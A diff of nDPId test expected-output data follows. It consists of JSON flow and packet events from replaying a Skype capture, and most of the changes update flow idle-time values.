+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1431970686381,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970686381,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0k+pAAPQG+tJbvtp9wKgBIjA+yFVGmTUullnkt4ASH\/5npwAAAgQFoAEDAwQBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":3,"flow_last_seen":1431970686381,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686381,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoqoZAAEAGmEPAqAEiW77afchVMD6WWeS3Rpk1L1AQIACoYAAA"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1361,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":1431970686624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686624,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoWF8AAEARnvLAqAEiwKgBAeasFOcAFAzzAAEAADLdMt0AAA4Q"} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1362,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1431970686627,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970686627,"pkt":"PBXCt3IO0NQSxnP1CABFwABElr8AAEABX8bAqAEBwKgBIgMDgJYAAAAARQAAKFhfAABAEZ7ywKgBIsCoAQHmrBTnABQM8wABAAAy3TLdAAAOEA=="} 
-00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1368,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970682971,"flow_last_seen":1431970686763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3635,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1431970686763,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1372,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970686843,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970686843,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970686843,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXdpAAEAG5NfAqAEiW77afchWAbv9gi8BAAAAALAC\/\/+4gAAAAgQFtAEDAwUBAQgKPjJRrgAAAAAEAgAA"} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1431970686906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970686906,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0rxlAAPQG36Nbvtp9wKgBIgG7yFakF93g\/YIvAoASH\/7ehAAAAgQFoAEDAwQBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1431970686906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686906,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoj59AAEAGsyrAqAEiW77afchWAbv9gi8CpBfd4VAQIAAfPgAA"} +00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1368,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970682971,"flow_last_seen":1431970686763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3635,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1431970686763,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1372,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970686843,"flow_last_seen":1431970686843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970686843,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1431970686843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970686843,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXdpAAEAG5NfAqAEiW77afchWAbv9gi8BAAAAALAC\/\/+4gAAAAgQFtAEDAwUBAQgKPjJRrgAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1431970686906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970686906,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0rxlAAPQG36Nbvtp9wKgBIgG7yFakF93g\/YIvAoASH\/7ehAAAAgQFoAEDAwQBAQQC"} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1431970686906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686906,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoj59AAEAGsyrAqAEiW77afchWAbv9gi8CpBfd4VAQIAAfPgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1431970687261,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687261,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuS7AAAEAREzPAqAEirjGr4DLdfQsAGuTOfB8CfeyODsgiOuU1SIeok9yn"} 
00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -815,156 +815,156 @@ 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1431970687262,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687262,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuOf4AAEAROozAqAEivbyGrjLdV6QAGoKkfCUCWKDpreHeWqMtL4LNh6CD"} 00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjTxAAEAG\/gPAqAEiTKehBshYTzLHdCWnAAAAALAC\/\/\/vzwAAAgQFtAEDAwUBAQgKPjJU3AAAAAAEAgAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABADkBAAEAGGvXAqAEiR+4Hy8hZSU+Qnyq6AAAAALAC\/\/\/FaAAAAgQFtAEDAwUBAQgKPjJU3AAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtDFAAEAGA+fAqAEiBfi63chaeSLm2Z5sAAAAALAC\/\/9aigAAAgQFtAEDAwUBAQgKPjJU3QAAAAAEAgAA"} 
-00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":1431970687774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687774,"pkt":"PBXCt3IO0NQSxnP1CABFAABA71RAAHIGlsMF+LrdwKgBInkiyFqd8pp25tmebbASRBBwGwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":3,"flow_last_seen":1431970687774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687774,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QypAAEAGdPrAqAEiBfi63chaeSLm2Z5tnfKad4AQECxRTAAAAQEICj4yVUQAAAAA"} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1422,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1431970687881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687881,"pkt":"PBXCt3IO0NQSxnP1CABFAABArt9AAHMGR1VH7gfLwKgBIklPyFnlnJYLkJ8qu7AS\/\/\/byQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1431970687881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687881,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JOpAAEAGBFfAqAEiR+4Hy8hZSU+Qnyq75ZyWDIAQECx4gAAAAQEICj4yVa4AAAAA"} 
-00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":1431970687953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970687953,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yyFgS\/h6Xx3QlqKAScSDnSgAAAgQFrAQCCAq+r7gZPjJU3AEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1431970687953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687953,"pkt":"0NQSxnP1PBXCt3IOCABFAAA06CNAAEAGoyjAqAEiTKehBshYTzLHdCWoEv4emIAQECx16wAAAQEICj4yVfS+r7gZ"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjTxAAEAG\/gPAqAEiTKehBshYTzLHdCWnAAAAALAC\/\/\/vzwAAAgQFtAEDAwUBAQgKPjJU3AAAAAAEAgAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABADkBAAEAGGvXAqAEiR+4Hy8hZSU+Qnyq6AAAAALAC\/\/\/FaAAAAgQFtAEDAwUBAQgKPjJU3AAAAAAEAgAA"} 
+00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtDFAAEAGA+fAqAEiBfi63chaeSLm2Z5sAAAAALAC\/\/9aigAAAgQFtAEDAwUBAQgKPjJU3QAAAAAEAgAA"} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":1431970687774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687774,"pkt":"PBXCt3IO0NQSxnP1CABFAABA71RAAHIGlsMF+LrdwKgBInkiyFqd8pp25tmebbASRBBwGwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":3,"flow_last_seen":1431970687774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687774,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QypAAEAGdPrAqAEiBfi63chaeSLm2Z5tnfKad4AQECxRTAAAAQEICj4yVUQAAAAA"} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1422,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1431970687881,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687881,"pkt":"PBXCt3IO0NQSxnP1CABFAABArt9AAHMGR1VH7gfLwKgBIklPyFnlnJYLkJ8qu7AS\/\/\/byQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1431970687881,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687881,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JOpAAEAGBFfAqAEiR+4Hy8hZSU+Qnyq75ZyWDIAQECx4gAAAAQEICj4yVa4AAAAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":1431970687953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970687953,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yyFgS\/h6Xx3QlqKAScSDnSgAAAgQFrAQCCAq+r7gZPjJU3AEDAwc="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1431970687953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687953,"pkt":"0NQSxnP1PBXCt3IOCABFAAA06CNAAEAGoyjAqAEiTKehBshYTzLHdCWoEv4emIAQECx16wAAAQEICj4yVfS+r7gZ"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1431970688025,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970688025,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuOK8AAEARxlrAqAEib91KDjLdAbsAGqZSfFUC4vleo7UvMvPmsU4YCKBd"} 
00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 